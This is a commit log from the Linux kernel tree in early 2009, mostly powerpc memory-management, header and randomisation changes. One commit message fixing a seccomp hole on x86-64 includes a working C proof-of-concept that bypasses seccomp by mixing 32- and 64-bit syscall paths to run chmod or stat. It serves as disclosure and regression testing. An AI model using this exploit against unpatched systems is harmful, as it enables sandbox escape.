Commit graph

299 commits

Author SHA1 Message Date
Kumar Gala
2319f12395 powerpc/mm: e300c2/c3/c4 TLB errata workaround
Complete workaround for DTLB errata in e300c2/c3/c4 processors.

Due to the bug, the hardware-implemented LRU algorythm always goes to way
1 of the TLB. This fix implements the proposed software workaround in
form of a LRW table for chosing the TLB-way.

Based on patch from David Jander <david@protonic.nl>

Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-24 13:47:32 +11:00
Kumar Gala
4ae0ff606e powerpc: expect all devices calling dma ops to have archdata set
Now that we set archdata for of_platform and platform devices via
platform_notify() we no longer need to special case having a NULL device
pointer or NULL archdata.  It should be a driver error if this condition
shows up and the driver should be fixed.

Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-24 13:47:31 +11:00
Rusty Russell
56aa4129e8 cpumask: Use mm_cpumask() wrapper instead of cpu_vm_mask
Makes code futureproof against the impending change to mm->cpu_vm_mask.

It's also a chance to use the new cpumask_ ops which take a pointer
(the older ones are deprecated, but there's no hurry for arch code).

Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-24 13:47:29 +11:00
Jeremy Kerr
098e8957af powerpc: Add dispatch trace log fields to lppaca
PAPR v2.3 defines fields in the virtual processor area for a dispatch
trace log (DLT). Since we'd like to use the DLT, add the necessary
fields to struct lppaca.

Signed-off-by: Jeremy Kerr <jk@ozlabs.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-24 13:47:27 +11:00
Jeremy Kerr
4032278324 powerpc: Fix page_ins details in lppaca comments
The page_ins member ends at byte 0x3, not 0x4. Also, fix up the
alignment.

Signed-off-by: Jeremy Kerr <jk@ozlabs.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-24 13:47:27 +11:00
Benjamin Herrenschmidt
9e41d9597e Merge commit 'origin/master' into next 2009-03-24 13:38:30 +11:00
Benjamin Herrenschmidt
77ecfe8d42 Merge commit 'gcl/next' into next 2009-03-20 16:27:57 +11:00
Benjamin Herrenschmidt
a7d2dac802 powerpc/mm: Unify PTE_RPN_SHIFT and _PAGE_CHG_MASK definitions
This updates the 32-bit headers to use the same definitions for the RPN
shift inside the PTE as 64-bit, and thus updates _PAGE_CHG_MASK to
become identical.

This does introduce a runtime visible difference, which is that now,
_PAGE_HASHPTE will be part of _PAGE_CHG_MASK and thus preserved. However
this should have no practical effect as it should have been preserved in
the first place and we got away with not having it there due to our
PTE access functions preserving it anyway.

Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-20 15:56:58 +11:00
Benjamin Herrenschmidt
c605782b1c powerpc/mm: Split the various pgtable-* headers based on MMU type
This patch moves the definition of the PTE format for each MMU type
to separate files instead of all in one file. This improves overall
maintainability and will make it easier to add new types.

On 64-bit, additionally, I've separated the headers relative to the
format of the page table tree (3 vs. 4 levels for 64K vs 4K pages)
from the headers specific to the PTE format for hash based processors,
this will make it easier to add support for Book3 "E" 64-bit
implementations.

There are still some type-related ifdef's in the generic headers,
we might remove them in the long run, but this patch shouldn't result
in any code change, -hopefully- just definitions being moved around.

Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-20 15:56:57 +11:00
Michael Ellerman
11df1f0551 PCI/MSI: Use #ifdefs instead of weak functions
Weak functions aren't all they're cracked up to be. They lead to
incorrect binaries with some toolchains, they require us to have empty
functions we otherwise wouldn't, and the unused code is not elided
(as of gcc 4.3.2 anyway).

So replace the weak MSI arch hooks with the #define foo foo idiom. We no
longer need empty versions of arch_setup/teardown_msi_irq().

This is less source (by 1 line!), and results in smaller binaries too:

   text	   data	    bss	    dec	    hex	filename
9354300	1693916	 678424	11726640 b2ef30	build/powerpc/vmlinux-before
9354052	1693852	 678424	11726328 b2edf8	build/powerpc/vmlinux-after

Also smaller on x86_64 and arm (iop13xx).

Signed-off-by: Michael Ellerman <michael@ellerman.id.au>
Signed-off-by: Jesse Barnes <jbarnes@virtuousgeek.org>
2009-03-19 19:29:26 -07:00
Stephen Rothwell
17ad6ea621 numa, cpumask: move numa_node_id default implementation to topology.h, fix
Impact: build fix for powerpc and sparc

Today's linux-next build (powerpc allyesconfig) failed like this:

> In file included from include/linux/mmzone.h:776,
>                  from include/linux/gfp.h:5,
>                  from include/linux/kmod.h:23,
>                  from include/linux/module.h:14,
>                  from init/version.c:11:
> arch/powerpc/include/asm/mmzone.h:32: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'numa_cpumask_lookup_table'

Caused by commit 082edb7bf4 ("numa,
cpumask: move numa_node_id default implementation to topology.h") from
the cpus4096 tree which removed the include of linux/topology.h from
linux/mmzone.h.

Same for sparc64 defconfig.

Signed-off-by: Stephen Rothwell <sfr@canb.auug.org.au>
Acked-b: Rusty Russell <rusty@rustcorp.com.au>
Cc: ppc-dev <linuxppc-dev@ozlabs.org>
LKML-Reference: <20090319220322.3baa4613.sfr@canb.auug.org.au>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-19 12:51:25 +01:00
Piotr Ziecik
c9310920e6 powerpc/5200: Enable CPU_FTR_NEED_COHERENT for MPC52xx
BestComm, a DMA engine in MPC52xx SoC, requires snooping when
CPU caches are enabled to work properly.

Adding CPU_FTR_NEED_COHERENT fixes NFS problems on MPC52xx machines
introduced by 'powerpc/mm: Fix handling of _PAGE_COHERENT in BAT setup
code' (sha1: 4c456a67f5).

Signed-off-by: Piotr Ziecik <kosmo@semihalf.com>
Signed-off-by: Grant Likely <grant.likely@secretlab.ca>
2009-03-17 09:17:50 -06:00
Wolfgang Grandegger
df8a95f46f powerpc/5200: add function to return external clock frequency
This patch adds the utility function mpc52xx_get_xtal_freq() to get
the frequency of the external oscillator clock connected to the pin
SYS_XTAL_IN. The MSCAN may us it as clock source. Unfortunately, this
value is not available from the FDT blob, but it can be determined
from the IPB frequency.

Signed-off-by: Wolfgang Grandegger <wg@grandegger.com>
Signed-off-by: Grant Likely <grant.likely@secretlab.ca>
2009-03-11 09:36:26 -06:00
Thomas Gleixner
353bca5ed4 powerpc/irq: Convert obsolete hw_interrupt_type to struct irq_chip
Impact: cleanup

Convert the last remaining users to struct irq_chip.

Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
CC: Benjamin Herrenschmidt <benh@kernel.crashing.org>
CC: linuxppc-dev@ozlabs.org
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-11 17:11:34 +11:00
Andrew Klossner
af9c724907 powerpc/udbg: Fix lost byte during console handover; change LFCR to CRLF
When the console is on a serial port to be driven by serial8250, a
character can be lost from the end of the first line in the two-line
sequence

	serial8250.0: ttyS0 at MMIO 0xe0004500 (irq = 42) is a 16550A
	console handover: boot [udbg0] -> real [ttyS0]

This happens because udbg_puts or udbg_write stuff the last byte of
the line into the Tx FIFO and return, whereupon the serial8250
initialization code immediately empties that FIFO.  The fix: udbg_puts
and udbg_write now wait for the Tx FIFO to clear before returning.
This delays the system by one additional serial frame time for each
line written by udbg, but the effect is not noticeable, a cumulative
17 milliseconds for 200 lines of early printk output at 115200 baud.

Also, the routines in udbg_16550.c now emit CRLF instead of LFCR.
Linux makes a point of emitting CRLF because, when serial output is
captured to a file, LFCR sequences can confuse text editors.  See
http://lkml.org/lkml/2006/2/4/50 for some history.

Signed-off-by: Andrew Klossner <andrew@cesa.opbu.xerox.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-11 17:11:34 +11:00
roel kluin
e7eec2fc27 powerpc/ps3: Make ps3av_set_video_mode mode ID signed
Change the ps3av_auto_videomode() mode id argument type from unsigned to
signed so a negative id can be detected and reported as an -EINVAL failure.

Signed-off-by: Roel Kluin <roel.kluin@gmail.com>
Signed-off-by: Geoff Levand <geoffrey.levand@am.sony.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-11 17:10:17 +11:00
Geoff Levand
c9c38320e8 powerpc: Add missing DABR flags
The powerpc 64 bit architecture defines three flags for the
DABR (Data Address Breakpoint Register).  Add definitions
for the currently missing DABR_DATA_WRITE and DABR_DATA_READ
flags to the powerpc reg.h file.

Signed-off-by: Geoff Levand <geoffrey.levand@am.sony.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-11 17:10:16 +11:00
Timur Tabi
9dca4efe88 powerpc: Add defintion for MSR[GS] to list of MSR bits
Add macros for the GS (guest state) bit to the list of MSR bit definitions.
On PowerPC cores that support embedded hypervisor mode, GS is cleared if
the system is running in hypervisor state (and MSR[PR] is cleared), and set
if it's running in guest state.  See the Power ISA 2.06 specification for
more information.

Signed-off-by: Timur Tabi <timur@freescale.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-11 17:10:16 +11:00
Benjamin Herrenschmidt
1cdab55d8a powerpc: Wire up /proc/vmallocinfo to our ioremap()
This adds the necessary bits and pieces to powerpc implementation of
ioremap to benefit from caller tracking in /proc/vmallocinfo, at least
for ioremap's done after mem init as the older ones aren't tracked.

Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-11 17:10:14 +11:00
Benjamin Herrenschmidt
e14eee56c2 Merge commit 'origin/master' into next 2009-03-11 17:10:07 +11:00
Kumar Gala
c3071951d0 powerpc/fsl-booke: Add support for tlbilx instructions
The e500mc core supports the new tlbilx instructions that do core
local invalidates and also provide us the ability to take down
all TLB entries matching a given PID.

Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
2009-03-09 09:25:38 -05:00
David S. Miller
508827ff0a Merge branch 'master' of master.kernel.org:/pub/scm/linux/kernel/git/davem/net-2.6
Conflicts:
	drivers/net/tokenring/tmspci.c
	drivers/net/ucc_geth_mii.c
2009-03-05 02:06:47 -08:00
Ingo Molnar
8b0e5860cb Merge branches 'x86/apic', 'x86/cpu', 'x86/fixmap', 'x86/mm', 'x86/sched', 'x86/setup-lzma', 'x86/signal' and 'x86/urgent' into x86/core 2009-03-04 02:22:31 +01:00
Benjamin Herrenschmidt
652e8f8d57 Merge commit 'jwb/next' into next 2009-03-03 13:30:03 +11:00
Roland McGrath
5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
David S. Miller
e70049b9e7 Merge branch 'master' of /home/davem/src/GIT/linux-2.6/ 2009-02-24 03:50:29 -08:00
Anton Blanchard
501cb16d3c powerpc: Randomise PIEs
Randomise ELF_ET_DYN_BASE, which is used when loading position independent
executables.

Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-23 15:53:21 +11:00
Anton Blanchard
912f9ee21c powerpc: Randomise the brk region
Randomize the heap.

before:
tundro2:~ # sleep 1 & cat /proc/${!}/maps | grep heap
10017000-10118000 rw-p 10017000 00:00 0                                  [heap]
10017000-10118000 rw-p 10017000 00:00 0                                  [heap]
10017000-10118000 rw-p 10017000 00:00 0                                  [heap]
10017000-10118000 rw-p 10017000 00:00 0                                  [heap]
10017000-10118000 rw-p 10017000 00:00 0                                  [heap]

after
tundro2:~ # sleep 1 & cat /proc/${!}/maps | grep heap
19419000-1951a000 rw-p 19419000 00:00 0                                  [heap]
325ff000-32700000 rw-p 325ff000 00:00 0                                  [heap]
1a97c000-1aa7d000 rw-p 1a97c000 00:00 0                                  [heap]
1cc60000-1cd61000 rw-p 1cc60000 00:00 0                                  [heap]
1afa9000-1b0aa000 rw-p 1afa9000 00:00 0                                  [heap]

Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-23 15:53:20 +11:00
Anton Blanchard
d839088cae powerpc: Randomise lower bits of stack address
Randomise the lower bits of the stack address. More randomisation is good for
security but the scatter can also help with SMT threads that share an L1. A
quick test case shows this working:

int main()
{
	int sp;
	printf("%x\n", (unsigned long)&sp & 4095);
}

before:
80
80
80
80
80

after:
610
490
300
6b0
d80

Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-23 15:53:20 +11:00
Anton Blanchard
2dadb987e0 powerpc: More stack randomisation for 64bit binaries
At the moment we randomise the stack by 8MB on 32bit and 64bit tasks. Since we
have a lot more address space to play with on 64bit, lets do what x86 does and
increase that randomisation to 1GB:

before:
# for i in seq `1 10` ; do sleep 1 & cat /proc/${!}/maps | grep stack; done
fffffebc000-fffffed1000 rw-p ffffffeb000 00:00 0       [stack]
ffffff5a000-ffffff6f000 rw-p ffffffeb000 00:00 0       [stack]
fffffdb2000-fffffdc7000 rw-p ffffffeb000 00:00 0       [stack]
fffffd3e000-fffffd53000 rw-p ffffffeb000 00:00 0       [stack]
fffffad9000-fffffaee000 rw-p ffffffeb000 00:00 0       [stack]

after:
# for i in seq `1 10` ; do sleep 1 & cat /proc/${!}/maps | grep stack; done
ffff5c27000-ffff5c3c000 rw-p ffffffeb000 00:00 0       [stack]
fffebe5e000-fffebe73000 rw-p ffffffeb000 00:00 0       [stack]
fffcb298000-fffcb2ad000 rw-p ffffffeb000 00:00 0       [stack]
fffc719d000-fffc71b2000 rw-p ffffffeb000 00:00 0       [stack]
fffe01af000-fffe01c4000 rw-p ffffffeb000 00:00 0       [stack]

Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-23 15:53:07 +11:00
Anton Blanchard
a465f9b694 powerpc: Move is_32bit_task
Move is_32bit_task into asm/thread_info.h, that allows us to test for
32/64bit tasks without an ugly CONFIG_PPC64 ifdef.

Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-23 15:53:06 +11:00
Kumar Gala
620165f971 powerpc: Add support for using doorbells for SMP IPI
The e500mc supports the new msgsnd/doorbell mechanisms that were added in
the Power ISA 2.05 architecture.  We use the normal level doorbell for
doing SMP IPIs at this point.

Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-23 15:53:03 +11:00
Kumar Gala
812d904e39 powerpc: Fix warnings from make headers_check
include/asm/bootx.h:12: include of <linux/types.h> is preferred over <asm/types.h>
include/asm/bootx.h:57: found __[us]{8,16,32,64} type without #include <linux/types.h>
include/asm/elf.h:5: include of <linux/types.h> is preferred over <asm/types.h>
include/asm/kvm.h:23: include of <linux/types.h> is preferred over <asm/types.h>
include/asm/kvm.h:26: found __[us]{8,16,32,64} type without #include <linux/types.h>
include/asm/ps3fb.h:33: found __[us]{8,16,32,64} type without #include <linux/types.h>
include/asm/spu_info.h:27: found __[us]{8,16,32,64} type without #include <linux/types.h>
include/asm/swab.h:11: include of <linux/types.h> is preferred over <asm/types.h>

Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-23 10:48:57 +11:00
Kumar Gala
16c57b3620 powerpc: Unify opcode definitions and support
Create a new header that becomes a single location for defining PowerPC
opcodes used by code that is either generationg instructions
at runtime (fixups, debug, etc.), emulating instructions, or just
compiling instructions old assemblers don't know about.

We currently don't handle the floating point emulation or alignment decode
as both are better handled by the specific decode support they already
have.

Added support for the new dcbzl, dcbal, msgsnd, tlbilx, & wait instructions
since older assemblers don't know about them.

Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-23 10:48:56 +11:00
Steven Rostedt
bf528a3a9b powerpc32, ftrace: save and restore mcount regs with macro
Impact: clean up

Use a macro to save and restore the registers for PowerPC32,
since that code is duplicated.

This is similar to the work done by Cyrill Gorcunov for the
mcount code in x86_64.

Acked-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-23 10:48:54 +11:00
Ingo Molnar
fc6fc7f1b1 Merge branch 'linus' into x86/apic
Conflicts:
	arch/x86/mach-default/setup.c

Semantic conflict resolution:
	arch/x86/kernel/setup.c

Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-22 20:05:19 +01:00
Ingo Molnar
3b6f7b9beb Merge branch 'x86/urgent' into x86/core 2009-02-20 17:40:43 +01:00
Benjamin Herrenschmidt
3b7faeb49e Merge commit 'kumar/next' into next 2009-02-18 13:23:30 +11:00
Benjamin Herrenschmidt
82a0a1cc8f Merge commit 'origin/master' into next
Manual merge of:
	arch/powerpc/include/asm/pgtable-ppc32.h
2009-02-18 13:19:25 +11:00
Patrick Ohly
cb9eff0978 net: new user space API for time stamping of incoming and outgoing packets
User space can request hardware and/or software time stamping.
Reporting of the result(s) via a new control message is enabled
separately for each field in the message because some of the
fields may require additional computation and thus cause overhead.
User space can tell the different kinds of time stamps apart
and choose what suits its needs.

When a TX timestamp operation is requested, the TX skb will be cloned
and the clone will be time stamped (in hardware or software) and added
to the socket error queue of the skb, if the skb has a socket
associated with it.

The actual TX timestamp will reach userspace as a RX timestamp on the
cloned packet. If timestamping is requested and no timestamping is
done in the device driver (potentially this may use hardware
timestamping), it will be done in software after the device's
start_hard_xmit routine.

Signed-off-by: Patrick Ohly <patrick.ohly@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-02-15 22:43:33 -08:00
Yuri Tikhonov
e12401222f powerpc/44x: Support for 256KB PAGE_SIZE
This patch adds support for 256KB pages on ppc44x-based boards.

For simplification of implementation with 256KB pages we still assume
2-level paging. As a side effect this leads to wasting extra memory space
reserved for PTE tables: only 1/4 of pages allocated for PTEs are
actually used. But this may be an acceptable trade-off to achieve the
high performance we have with big PAGE_SIZEs in some applications (e.g.
RAID).

Also with 256KB PAGE_SIZE we increase THREAD_SIZE up to 32KB to minimize
the risk of stack overflows in the cases of on-stack arrays, which size
depends on the page size (e.g. multipage BIOs, NTFS, etc.).

With 256KB PAGE_SIZE we need to decrease the PKMAP_ORDER at least down
to 9, otherwise all high memory (2 ^ 10 * PAGE_SIZE == 256MB) we'll be
occupied by PKMAP addresses leaving no place for vmalloc. We do not
separate PKMAP_ORDER for 256K from 16K/64K PAGE_SIZE here; actually that
value of 10 in support for 16K/64K had been selected rather intuitively.
Thus now for all cases of PAGE_SIZE on ppc44x (including the default, 4KB,
one) we have 512 pages for PKMAP.

Because ELF standard supports only page sizes up to 64K, then you should
use binutils later than 2.17.50.0.3 with '-zmax-page-size' set to 256K
for building applications, which are to be run with the 256KB-page sized
kernel. If using the older binutils, then you should patch them like follows:

	--- binutils/bfd/elf32-ppc.c.orig
	+++ binutils/bfd/elf32-ppc.c

	-#define ELF_MAXPAGESIZE                0x10000
	+#define ELF_MAXPAGESIZE                0x40000

One more restriction we currently have with 256KB page sizes is inability
to use shmem safely, so, for now, the 256KB is available only if you turn
the CONFIG_SHMEM option off (another variant is to use BROKEN).
Though, if you need shmem with 256KB pages, you can always remove the !SHMEM
dependency in 'config PPC_256K_PAGES', and use the workaround available here:
 http://lkml.org/lkml/2008/12/19/20

Signed-off-by: Yuri Tikhonov <yur@emcraft.com>
Signed-off-by: Ilya Yanok <yanok@emcraft.com>
Signed-off-by: Josh Boyer <jwboyer@linux.vnet.ibm.com>
2009-02-14 14:40:04 -05:00
Philippe Gerum
fbc78b07ba powerpc/mm: Fix _PAGE_CHG_MASK to protect _PAGE_SPECIAL
Fix _PAGE_CHG_MASK so that pte_modify() does not affect the _PAGE_SPECIAL bit.

Signed-off-by: Philippe Gerum <rpm@xenomai.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-13 16:37:44 +11:00
Kumar Gala
70fe3af840 powerpc/book-3e: Introduce concept of Book-3e MMU
The Power ISA 2.06 spec introduces a standard MMU programming model that
is based on the Freescale Book-E MMU programing model.  The Freescale
version is pretty backwards compatiable with the ISA 2.06 definition so
we are starting to refactor some of the Freescale code so it can be
easily shared.

Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
2009-02-12 16:51:33 -06:00
Kumar Gala
d66c82ea45 powerpc/fsl-booke: Add new ISA 2.06 page sizes and MAS defines
The Power ISA 2.06 added power of two page sizes to the embedded MMU
architecture.  Its done it such a way to be code compatiable with the
existing HW.  Made the minor code changes to support both power of two
and power of four page sizes.  Also added some new MAS bits and macros
that are defined as part of the 2.06 ISA.  Renamed some things to use
the 'Book-3e' concept to convey the new MMU that is based on the
Freescale Book-E MMU programming model.

Note, its still invalid to try and use a page size that isn't supported
by cpu.

Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
2009-02-12 16:37:11 -06:00
Benjamin Herrenschmidt
8d30c14cab powerpc/mm: Rework I$/D$ coherency (v3)
This patch reworks the way we do I and D cache coherency on PowerPC.

The "old" way was split in 3 different parts depending on the processor type:

   - Hash with per-page exec support (64-bit and >= POWER4 only) does it
at hashing time, by preventing exec on unclean pages and cleaning pages
on exec faults.

   - Everything without per-page exec support (32-bit hash, 8xx, and
64-bit < POWER4) does it for all page going to user space in update_mmu_cache().

   - Embedded with per-page exec support does it from do_page_fault() on
exec faults, in a way similar to what the hash code does.

That leads to confusion, and bugs. For example, the method using update_mmu_cache()
is racy on SMP where another processor can see the new PTE and hash it in before
we have cleaned the cache, and then blow trying to execute. This is hard to hit but
I think it has bitten us in the past.

Also, it's inefficient for embedded where we always end up having to do at least
one more page fault.

This reworks the whole thing by moving the cache sync into two main call sites,
though we keep different behaviours depending on the HW capability. The call
sites are set_pte_at() which is now made out of line, and ptep_set_access_flags()
which joins the former in pgtable.c

The base idea for Embedded with per-page exec support, is that we now do the
flush at set_pte_at() time when coming from an exec fault, which allows us
to avoid the double fault problem completely (we can even improve the situation
more by implementing TLB preload in update_mmu_cache() but that's for later).

If for some reason we didn't do it there and we try to execute, we'll hit
the page fault, which will do a minor fault, which will hit ptep_set_access_flags()
to do things like update _PAGE_ACCESSED or _PAGE_DIRTY if needed, we just make
this guys also perform the I/D cache sync for exec faults now. This second path
is the catch all for things that weren't cleaned at set_pte_at() time.

For cpus without per-pag exec support, we always do the sync at set_pte_at(),
thus guaranteeing that when the PTE is visible to other processors, the cache
is clean.

For the 64-bit hash with per-page exec support case, we keep the old mechanism
for now. I'll look into changing it later, once I've reworked a bit how we
use _PAGE_EXEC.

This is also a first step for adding _PAGE_EXEC support for embedded platforms

Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-11 16:00:10 +11:00
Michael Ellerman
33642d31d1 powerpc: Remove unused ppc64_terminate_msg()
Signed-off-by: Michael Ellerman <michael@ellerman.id.au>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-02-11 13:38:00 +11:00
Jaswinder Singh Rajput
48109870ba headers_check fix: powerpc, swab.h
fix the following 'make headers_check' warning:

  usr/include/asm-powerpc/swab.h:11: include of <linux/types.h> is preferred over <asm/types.h>

Signed-off-by: Jaswinder Singh Rajput <jaswinderrajput@gmail.com>
2009-02-01 11:01:29 +05:30
Jaswinder Singh Rajput
1a16bc4590 headers_check fix: powerpc, spu_info.h
fix the following 'make headers_check' warning:

  usr/include/asm-powerpc/spu_info.h:27: found __[us]{8,16,32,64} type without #include <linux/types.h>

Signed-off-by: Jaswinder Singh Rajput <jaswinderrajput@gmail.com>
2009-02-01 11:01:29 +05:30
Jaswinder Singh Rajput
122bb2207b headers_check fix: powerpc, ps3fb.h
fix the following 'make headers_check' warning:

  usr/include/asm-powerpc/ps3fb.h:33: found __[us]{8,16,32,64} type without #include <linux/types.h>

Signed-off-by: Jaswinder Singh Rajput <jaswinderrajput@gmail.com>
2009-02-01 11:01:29 +05:30
Jaswinder Singh Rajput
9f2cd967b7 headers_check fix: powerpc, kvm.h
fix the following 'make headers_check' warnings:

  usr/include/asm-powerpc/kvm.h:23: include of <linux/types.h> is preferred over <asm/types.h>
  usr/include/asm-powerpc/kvm.h:26: found __[us]{8,16,32,64} type without #include <linux/types.h>

Signed-off-by: Jaswinder Singh Rajput <jaswinderrajput@gmail.com>
2009-02-01 11:01:28 +05:30